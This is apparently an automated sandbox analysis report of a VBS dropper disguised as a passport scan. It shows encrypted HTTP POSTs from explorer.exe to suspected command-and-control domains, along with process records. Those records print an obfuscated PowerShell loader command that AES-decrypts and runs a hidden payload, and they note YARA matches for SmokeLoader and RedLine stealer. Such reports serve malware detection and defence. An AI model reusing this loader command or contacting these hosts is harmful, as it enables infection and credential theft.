                                                                                                                        Date: Thu, 19 Dec 2024 06:54:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        13192.168.2.74998494.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:15.258975029 CET281OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://cysylnlcrra.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 368
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:54:15.259001017 CET368OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a0 1f 57 cb
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)W6Z2#|Po[Q%\Vt{#F;=XA5ZutV%+jAH,^?<"bxgac{A{c):`k3^^bO?*H*Z
                                                                                                                        Dec 19, 2024 07:54:17.117568970 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:16 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        14192.168.2.74998594.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:17.307348013 CET283OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://sqbxkgmkuhr.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 317
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:54:17.307385921 CET317OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fc 26 68 a6
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)&hH$i<\BPt5UmLCjK@5Or_3gl;lo:8#$qgIRL$aQzuD#$bc&+cS1pEQar>PPP
                                                                                                                        Dec 19, 2024 07:54:18.641432047 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:18 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        15192.168.2.749986194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:18.771976948 CET278OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://doueaoxbsbt.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 224
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:54:18.772006989 CET224OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ef 56 5e d2
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)V^H|Bp3^d%LL8q.PDeOL qf&2dWecl`<!r8"hIus.I?YL,fx?F5-7
                                                                                                                        Dec 19, 2024 07:54:20.112735033 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:19 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        16192.168.2.74998794.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:20.962383032 CET286OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://mvghuvrbeajfrwtn.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 185
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:54:20.962409973 CET185OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 82 1f 34 8b
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)4rNPXu#`8[x^( P*K!,j5xl,re'VyU7ff~m0zlzx
                                                                                                                        Dec 19, 2024 07:54:22.321511030 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:22 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        17192.168.2.74998894.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:22.466948986 CET286OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://qohqjraearkdgi.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 110
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:54:22.466948986 CET110OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ef 57 60 c2
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)W`(#PzKo\"
                                                                                                                        Dec 19, 2024 07:54:23.838357925 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:23 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        18192.168.2.749989194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:23.962246895 CET280OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://mpxplxtebuujf.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 125
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:54:23.962266922 CET125OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9d 52 38 ad
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)R8TU(-Trpv.?$WhUY
                                                                                                                        Dec 19, 2024 07:54:25.302906036 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:25 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:01:52:16
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                                                                                                                        Imagebase:0x7ff67d180000
                                                                                                                        File size:170'496 bytes
                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:01:52:16
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)
                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:01:52:16
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:01:52:21
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Users\user\AppData\Roaming\putty.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:295'424 bytes
                                                                                                                        MD5 hash:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.1422409130.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Avira
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:01:52:28
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff70ffd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:7
                                                                                                                        Start time:01:52:48
                                                                                                                        Start date:19/12/2024
                                                                                                                        Path:C:\Users\user\AppData\Roaming\daersgt
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\daersgt
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:295'424 bytes
                                                                                                                        MD5 hash:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.1679840945.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.1730604658.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
